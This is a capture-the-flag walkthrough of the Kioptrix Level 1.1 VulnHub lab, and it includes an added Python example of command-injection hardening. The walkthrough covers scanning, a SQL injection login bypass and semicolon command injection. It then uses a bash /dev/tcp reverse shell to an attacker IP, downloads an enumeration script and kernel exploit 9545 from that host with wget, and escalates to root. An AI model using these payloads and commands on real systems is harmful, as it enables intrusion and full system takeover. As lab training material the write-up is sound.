Link: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
1. Network discovery
nmap -sn <ip range>/24
The target is 10.0.2.7.
2. Port scan
nmap -Pn 10.0.2.7
3. High port scan
nmap -Pn -p1000- 10.0.2.7
Nothing more was revealed compared to the previous scan.
4. Service and OS scan
nmap -p 22,80,111,443,631,3306 -A 10.0.2.7
5. Vuln scan
nmap -p 22,80,111,443,631,3306 --script vuln 10.0.2.7
7. Scan HTTP service on port 80
nikto -h http://10.0.2.7
Nothing more was revealed.
8. Access site
Read the page source; nothing much there.
Trying SQL injection by supplying this input in both fields:
' or 1=1--
9. On the next page, I will test its function by supplying an IP.
Success!!!
10. I’ll try command injection, starting with a backtick.
Nothing.
I tried with a semicolon.
Success!!!
Try another command.
Success!!!
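As an added example (not code from this walkthrough or from the Kioptrix VM), here is the code pattern that makes the semicolon injection above work, beside a hardened handler that only accepts a literal IPv4 address and runs ping without a shell. The function names and the ping flags are assumptions.

```python
"""Added example, not code from the walkthrough: the shape of the command
injection behind the Kioptrix 2 ping page, beside a hardened handler.
Function names and the ping arguments are assumptions."""
import ipaddress
import subprocess


def vulnerable_ping_command(user_input: str) -> str:
    """The bug pattern: user text is spliced into a shell command string,
    so a ';' (or backticks) in the input starts a second command."""
    return "ping -c 3 " + user_input


def validate_ipv4(user_input: str) -> str:
    """Return the address only if it parses as a literal IPv4 address;
    anything else (hostnames, shell metacharacters) raises ValueError."""
    try:
        return str(ipaddress.IPv4Address(user_input.strip()))
    except ipaddress.AddressValueError as exc:
        raise ValueError(f"not an IPv4 address: {user_input!r}") from exc


def is_safe_target(user_input: str) -> bool:
    """True when the hardened handler would accept the input."""
    try:
        validate_ipv4(user_input)
        return True
    except ValueError:
        return False


def hardened_ping_argv(user_input: str) -> list:
    """Build an argv list for subprocess: with shell=False the OS receives
    the arguments directly, so ';', '|' and '`' have no special meaning."""
    return ["ping", "-c", "3", validate_ipv4(user_input)]


def run_ping(user_input: str) -> str:
    """Run ping on a validated address and return its stdout."""
    proc = subprocess.run(hardened_ping_argv(user_input),
                          capture_output=True, text=True, timeout=15)
    return proc.stdout


if __name__ == "__main__":
    # Constructed probes: one clean address, two with shell metacharacters.
    for probe in ["10.0.2.7", "10.0.2.7;id", "`id`"]:
        print(repr(probe), "-> shell string:", vulnerable_ping_command(probe),
              "| accepted by hardened handler:", is_safe_target(probe))
```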
11. Next, I will get a reverse shell.
Create listener on port 1234
rlwrap nc -lvp 1234
12. Paste a reverse shell command from the cheatsheet.
I succeeded using this command.
Edit the IP and port number to match the listener.
10.0.2.24;bash -i >& /dev/tcp/10.0.2.24/1234 0>&1
Back to listener, now I have a shell.
Verify user
whoami
13. Privilege escalation.
I’ll use this script (lse.sh) to do system enumeration. Serve it from the attacker machine:
python -m SimpleHTTPServer 80
Download the script to the target, make it executable and run it:
wget http://10.0.2.24/lse.sh
chmod +x lse.sh
./lse.sh
I’ll start by searching for a kernel exploit. From the script result, it’s CentOS 4.5 with Linux kernel 2.6.9.
Looking it up on Google, I came across the second script in the results.
Its number is 9545.
Copy it with searchsploit.
searchsploit -m 9545
Download it to the target machine (served from the attacker’s HTTP server).
wget http://10.0.2.24/9545.c
Read the script for the compile command, then compile, run it and verify:
gcc -Wall -o linux-sendpage 9545.c
./linux-sendpage
whoami
Now, I’m root.
Reading files on the system, I came across /var/mail/root.
cat /var/mail/root